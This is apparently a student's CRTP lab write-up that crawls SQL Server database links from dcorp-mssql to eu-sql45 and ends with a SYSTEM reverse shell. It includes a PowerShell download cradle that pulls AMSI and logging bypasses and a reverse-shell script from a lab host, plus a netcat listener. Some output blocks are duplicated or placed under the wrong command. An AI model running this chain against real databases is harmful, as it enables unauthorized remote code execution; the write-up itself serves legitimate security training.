# 22 - LO 2️2️

## Tasks

1 - Get a reverse shell on a SQL server in eurocorp forest by abusing database links from dcorp-mssql

Flag 37 \[dcorp-mssql] - First SQL Server linked to dcorp-mssql 🚩

Flag 38 \[dcorp-mssql] - Name of SQL Server user used to establish link between dcorp-sql1 and dcorp-mgmt 🚩

Flag 39 \[dcorp-mssql] - SQL Server privileges on eu-sql 🚩

Flag 40 \[dcorp-mssql] - Privileges on operating system of eu-sql 🚩

## Solutions

### 1 - Get a reverse shell on a SQL server in eurocorp forest by abusing database links from dcorp-mssql

Let's start with enumerating SQL servers in the domain and if studentx has privileges to connect to any of them. We can use PowerUpSQL module for that. Run the below command from a PowerShell session started using Invisi-Shell:

```
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
Import-Module C:\AD\Tools\PowerUpSQL-master\PowerupSQL.psd1
Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose
```

<figure><img src="/files/wFMctdAfgXBKmmguxo6A" alt=""><figcaption></figcaption></figure>

```
ComputerName           : dcorp-mssql.dollarcorp.moneycorp.local
Instance               : DCORP-MSSQL
DomainName             : dcorp
ServiceProcessID       : 1868
ServiceName            : MSSQLSERVER
ServiceAccount         : NT AUTHORITY\NETWORKSERVICE
AuthenticationMode     : Windows and SQL Server Authentication
ForcedEncryption       : 0
Clustered              : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion  : 2019
SQLServerEdition       : Developer Edition (64-bit)
SQLServerServicePack   : RTM
OSArchitecture         : X64
OsVersionNumber        : SQL
Currentlogin           : dcorp\student867
IsSysadmin             : No
ActiveSessions         : 1

ComputerName           : dcorp-mssql.dollarcorp.moneycorp.local
Instance               : DCORP-MSSQL
DomainName             : dcorp
ServiceProcessID       : 1868
ServiceName            : MSSQLSERVER
ServiceAccount         : NT AUTHORITY\NETWORKSERVICE
AuthenticationMode     : Windows and SQL Server Authentication
ForcedEncryption       : 0
Clustered              : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion  : 2019
SQLServerEdition       : Developer Edition (64-bit)
SQLServerServicePack   : RTM
OSArchitecture         : X64
OsVersionNumber        : SQL
Currentlogin           : dcorp\student867
IsSysadmin             : No
ActiveSessions         : 1
```

So, we can connect to dcorp-mssql. Using HeidiSQL client, let's login to dcorp-mssql using windows authentication of studentx. After login, enumerate linked databases on dcorp-mssql:

```
Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Verbose
```

```
ComputerName           : dcorp-mssql.dollarcorp.moneycorp.local
Instance               : DCORP-MSSQL
DomainName             : dcorp
ServiceProcessID       : 1868
ServiceName            : MSSQLSERVER
ServiceAccount         : NT AUTHORITY\NETWORKSERVICE
AuthenticationMode     : Windows and SQL Server Authentication
ForcedEncryption       : 0
Clustered              : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion  : 2019
SQLServerEdition       : Developer Edition (64-bit)
SQLServerServicePack   : RTM
OSArchitecture         : X64
OsVersionNumber        : SQL
Currentlogin           : dcorp\student867
IsSysadmin             : No
ActiveSessions         : 1

ComputerName           : dcorp-mssql.dollarcorp.moneycorp.local
Instance               : DCORP-MSSQL
DomainName             : dcorp
ServiceProcessID       : 1868
ServiceName            : MSSQLSERVER
ServiceAccount         : NT AUTHORITY\NETWORKSERVICE
AuthenticationMode     : Windows and SQL Server Authentication
ForcedEncryption       : 0
Clustered              : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion  : 2019
SQLServerEdition       : Developer Edition (64-bit)
SQLServerServicePack   : RTM
OSArchitecture         : X64
OsVersionNumber        : SQL
Currentlogin           : dcorp\student867
IsSysadmin             : No
ActiveSessions         : 1
```

So, there is a database link to dcorp-sql1 from dcorp-mssql. Let's enumerate further links from dcorpsql1. This can be done with the help of openquery:

```
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xo_cmdshell 'whoami'"
```

```
Version     : SQL Server 2019
Instance    : DCORP-MSSQL
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL}
User        : dcorp\student867
Links       : {DCORP-SQL1}

Version     : SQL Server 2019
Instance    : DCORP-SQL1
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1}
User        : dblinkuser
Links       : {DCORP-MGMT}

Version     : SQL Server 2019
Instance    : DCORP-MGMT
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User        : sqluser
Links       : {EU-SQL45.EU.EUROCORP.LOCAL}

Version     : SQL Server 2019
Instance    : EU-SQL45
CustomQuery :
Sysadmin    : 1
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL45.EU.EUROCORP.LOCAL}
User        : sa
Links       :
```

We can also use Get-SQLServerLinkCrawl for crawling the database links automatically:

```
select * from openquery("DCORP-SQL1",'select * from openquery("DCORP-MGMT",''select * from master..sysservers'')')
```

<figure><img src="/files/p0p0RrR5UMpk6rZrliyR" alt=""><figcaption></figcaption></figure>

Sweet! We have sysadmin on eu-sql server!

If xp\_cmdshell is enabled (or RPC out is true - which is set to false in this case), it is possible to execute commands on eu-sql using linked databases. To avoid dealing with a large number of quotes and escapes, we can use the following command:

```
Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Query "exec master..xp_cmdshell 'set username'"
```

<figure><img src="/files/V2dNixXYxlJpnXNdbSCp" alt=""><figcaption></figcaption></figure>

```
Version     : SQL Server 2019
Instance    : DCORP-MSSQL
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL}
User        : dcorp\student867
Links       : {DCORP-SQL1}

Version     : SQL Server 2019
Instance    : DCORP-SQL1
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1}
User        : dblinkuser
Links       : {DCORP-MGMT}

Version     : SQL Server 2019
Instance    : DCORP-MGMT
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User        : sqluser
Links       : {EU-SQL45.EU.EUROCORP.LOCAL}

Version     : SQL Server 2019
Instance    : EU-SQL45
CustomQuery : {USERNAME=SYSTEM, }
Sysadmin    : 1
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL45.EU.EUROCORP.LOCAL}
User        : sa
Links       :
```

**Create Invoke-PowerShellTcpEx.ps1:**

* Create a copy of Invoke-PowerShellTcp.ps1 and rename it to Invoke-PowerShellTcpEx.ps1.
* Open Invoke-PowerShellTcpEx.ps1 in PowerShell ISE (Right click on it and click Edit).
* Add "Power -Reverse -IPAddress 172.16.100.X -Port 443" (without quotes) to the end of the file.

Let's try to execute a PowerShell download execute cradle to execute a PowerShell reverse shell on the eu-sql instance, first to it, add sw on HFS and remember to edit Invoke-PowerShellTcpEx changing IP and Port

<figure><img src="/files/FAPBZ8gPEd3IgWT78nlA" alt=""><figcaption></figcaption></figure>

After that start a listener in a new shell: `C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443`

```
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://172.16.100.67/sbloggingbypass.txt);iex (iwr -UseBasicParsing http://172.16.100.67/amsibypass.txt);iex (iwr -UseBasicParsing http://172.16.100.67/Invoke-PowerShellTcpEx.ps1)"''' -QueryTarget eu-sql45
```

<figure><img src="/files/z5Wnkmuka8zUncOkDi38" alt=""><figcaption></figcaption></figure>

```
Version     : SQL Server 2019
Instance    : DCORP-MSSQL
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL}
User        : dcorp\student867
Links       : {DCORP-SQL1}

Version     : SQL Server 2019
Instance    : DCORP-SQL1
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1}
User        : dblinkuser
Links       : {DCORP-MGMT}

Version     : SQL Server 2019
Instance    : DCORP-MGMT
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User        : sqluser
Links       : {EU-SQL45.EU.EUROCORP.LOCAL}

Version     : SQL Server 2019
Instance    : EU-SQL45
CustomQuery :
Sysadmin    : 1
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL45.EU.EUROCORP.LOCAL}
User        : sa
Links       :
```

On the listener:

```
C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443
$env:username
$env:computername
```

<figure><img src="/files/Rp6SfXRcIrYtn6HGktas" alt=""><figcaption></figcaption></figure>

### Flag 37 \[dcorp-mssql] - First SQL Server linked to dcorp-mssql 🚩

The first SQL Server linked to dcorp-mssql is DCORP-SQL1.

```
Links on this server: DCORP-SQL1
```

### Flag 38 \[dcorp-mssql] - Name of SQL Server user used to establish link between dcorp-sql1 and dcorp-mgmt 🚩

sqluser is the name of SQL Server user used to establish link between dcorp-sql1 and dcorp-mgmt.

```
Server: EU-SQLX
- Link IsSysAdmin: 1
```

### Flag 39 \[dcorp-mssql] - SQL Server privileges on eu-sql 🚩

The SQL Server privileges on eu-sql is sysadmin.

```
Server: EU-SQLX
- Link IsSysAdmin: 1
```

### Flag 40 \[dcorp-mssql] - Privileges on operating system of eu-sql 🚩

```
PS C:\Windows\system32>$env:username
system
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://dev-angelist.gitbook.io/crtp-notes/readme/lab/22-lo-2-2.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.